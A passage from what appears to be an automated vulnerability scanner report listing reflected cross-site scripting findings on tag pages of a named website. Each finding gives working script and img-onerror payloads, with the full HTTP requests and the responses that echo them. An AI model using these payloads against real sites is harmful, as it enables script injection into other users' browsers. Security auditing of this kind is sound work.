The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 1d289</title><img%20src%3da%20onerror%3dalert(1)>34b20c9963c was submitted in the REST URL parameter 2. This input was echoed as 1d289</title><img src=a onerror=alert(1)>34b20c9963c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/master+resell+rights1d289</title><img%20src%3da%20onerror%3dalert(1)>34b20c9963c HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/how-to-win-with-online-reseller-products.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:55:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: master resell rights1d289</title><img src=a onerror=alert(1)>34b20c9963c</title>
...[SNIP]...

2.4312. http://www.resellerbase.com/tag/master+resell+rights [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/master+resell+rights

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 40f9a<img%20src%3da%20onerror%3dalert(1)>c5038c1fda was submitted in the REST URL parameter 2. This input was echoed as 40f9a<img src=a onerror=alert(1)>c5038c1fda in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/master+resell+rights40f9a<img%20src%3da%20onerror%3dalert(1)>c5038c1fda HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/how-to-win-with-online-reseller-products.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:55:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9816

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: maste
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : master resell rights40f9a<img src=a onerror=alert(1)>c5038c1fda]</td>
...[SNIP]...

2.4313. http://www.resellerbase.com/tag/mobile [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/mobile

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 291b2<script>alert(1)</script>81d292ef881 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag291b2<script>alert(1)</script>81d292ef881/mobile HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/mediaplazza-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:56:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag291b2<script>alert(1)</script>81d292ef881/mobile was not found on this server.</p>
...[SNIP]...

2.4314. http://www.resellerbase.com/tag/mobile [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/mobile

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c1b8e<script>alert(1)</script>4fe066e3df3b2d656 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tagc1b8e<script>alert(1)</script>4fe066e3df3b2d656/mobile?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/mobile
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:57:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagc1b8e<script>alert(1)</script>4fe066e3df3b2d656/mobile?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4315. http://www.resellerbase.com/tag/mobile [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/mobile

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 16b1f</title><img%20src%3da%20onerror%3dalert(1)>657f07635e57e6b6a was submitted in the REST URL parameter 2. This input was echoed as 16b1f</title><img src=a onerror=alert(1)>657f07635e57e6b6a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/mobile16b1f</title><img%20src%3da%20onerror%3dalert(1)>657f07635e57e6b6a?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/mobile
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9818

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: mobile16b1f</title><img src=a onerror=alert(1)>657f07635e57e6b6a</title>
...[SNIP]...

2.4316. http://www.resellerbase.com/tag/mobile [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/mobile

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fd1f2<img%20src%3da%20onerror%3dalert(1)>008c72b52e3f18f7c was submitted in the REST URL parameter 2. This input was echoed as fd1f2<img src=a onerror=alert(1)>008c72b52e3f18f7c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/mobilefd1f2<img%20src%3da%20onerror%3dalert(1)>008c72b52e3f18f7c?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/mobile
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: mobil
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : mobilefd1f2<img src=a onerror=alert(1)>008c72b52e3f18f7c]</td>
...[SNIP]...

2.4317. http://www.resellerbase.com/tag/mobile [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/mobile

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 8126c</title><img%20src%3da%20onerror%3dalert(1)>6c2d1a550d0 was submitted in the REST URL parameter 2. This input was echoed as 8126c</title><img src=a onerror=alert(1)>6c2d1a550d0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/mobile8126c</title><img%20src%3da%20onerror%3dalert(1)>6c2d1a550d0 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/mediaplazza-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: mobile8126c</title><img src=a onerror=alert(1)>6c2d1a550d0</title>
...[SNIP]...

2.4318. http://www.resellerbase.com/tag/mobile [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/mobile

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ec793<img%20src%3da%20onerror%3dalert(1)>98ed404d17e was submitted in the REST URL parameter 2. This input was echoed as ec793<img src=a onerror=alert(1)>98ed404d17e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/mobileec793<img%20src%3da%20onerror%3dalert(1)>98ed404d17e HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/mediaplazza-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9790

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: mobil
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : mobileec793<img src=a onerror=alert(1)>98ed404d17e]</td>
...[SNIP]...

2.4319. http://www.resellerbase.com/tag/nude [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/nude

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4daa1<script>alert(1)</script>8d0821ad67d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag4daa1<script>alert(1)</script>8d0821ad67d/nude HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/nudistfriends-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag4daa1<script>alert(1)</script>8d0821ad67d/nude was not found on this server.</p>
...[SNIP]...

2.4320. http://www.resellerbase.com/tag/outsource [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/outsource

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 47d3c<script>alert(1)</script>c6a5f456e50 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag47d3c<script>alert(1)</script>c6a5f456e50/outsource HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag47d3c<script>alert(1)</script>c6a5f456e50/outsource was not found on this server.</p>
...[SNIP]...

2.4321. http://www.resellerbase.com/tag/personals [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/personals

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e30b1<script>alert(1)</script>2c04607e71bd443c4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tage30b1<script>alert(1)</script>2c04607e71bd443c4/personals?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/personals
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:56:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tage30b1<script>alert(1)</script>2c04607e71bd443c4/personals?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4322. http://www.resellerbase.com/tag/personals [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/personals

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 69dca<script>alert(1)</script>bdb283600e4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag69dca<script>alert(1)</script>bdb283600e4/personals HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/datingrev-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:55:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag69dca<script>alert(1)</script>bdb283600e4/personals was not found on this server.</p>
...[SNIP]...

2.4323. http://www.resellerbase.com/tag/personals [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/personals

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 40b81<img%20src%3da%20onerror%3dalert(1)>16782e94da63cd96c was submitted in the REST URL parameter 2. This input was echoed as 40b81<img src=a onerror=alert(1)>16782e94da63cd96c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/personals40b81<img%20src%3da%20onerror%3dalert(1)>16782e94da63cd96c?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/personals
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: perso
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : personals40b81<img src=a onerror=alert(1)>16782e94da63cd96c]</td>
...[SNIP]...

2.4324. http://www.resellerbase.com/tag/personals [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/personals

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5a4b5<img%20src%3da%20onerror%3dalert(1)>dbb60554100 was submitted in the REST URL parameter 2. This input was echoed as 5a4b5<img src=a onerror=alert(1)>dbb60554100 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/personals5a4b5<img%20src%3da%20onerror%3dalert(1)>dbb60554100 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/datingrev-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9796

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: perso
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : personals5a4b5<img src=a onerror=alert(1)>dbb60554100]</td>
...[SNIP]...

2.4325. http://www.resellerbase.com/tag/personals [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/personals

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 706e1</title><img%20src%3da%20onerror%3dalert(1)>164e558f8ef was submitted in the REST URL parameter 2. This input was echoed as 706e1</title><img src=a onerror=alert(1)>164e558f8ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/personals706e1</title><img%20src%3da%20onerror%3dalert(1)>164e558f8ef HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/datingrev-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9812

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: personals706e1</title><img src=a onerror=alert(1)>164e558f8ef</title>
...[SNIP]...

2.4326. http://www.resellerbase.com/tag/personals [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/personals

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 4507c</title><img%20src%3da%20onerror%3dalert(1)>c199a0f6a9d3763ed was submitted in the REST URL parameter 2. This input was echoed as 4507c</title><img src=a onerror=alert(1)>c199a0f6a9d3763ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/personals4507c</title><img%20src%3da%20onerror%3dalert(1)>c199a0f6a9d3763ed?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/personals
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9824

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: personals4507c</title><img src=a onerror=alert(1)>c199a0f6a9d3763ed</title>
...[SNIP]...

2.4327. http://www.resellerbase.com/tag/phone [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/phone

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload aa289<script>alert(1)</script>b6e260c793a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagaa289<script>alert(1)</script>b6e260c793a/phone HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/worldkom-net.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:55:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagaa289<script>alert(1)</script>b6e260c793a/phone was not found on this server.</p>
...[SNIP]...

2.4328. http://www.resellerbase.com/tag/phone [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/phone

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 46e98<script>alert(1)</script>563538ca1e9b65748 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag46e98<script>alert(1)</script>563538ca1e9b65748/phone?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/phone
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:56:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

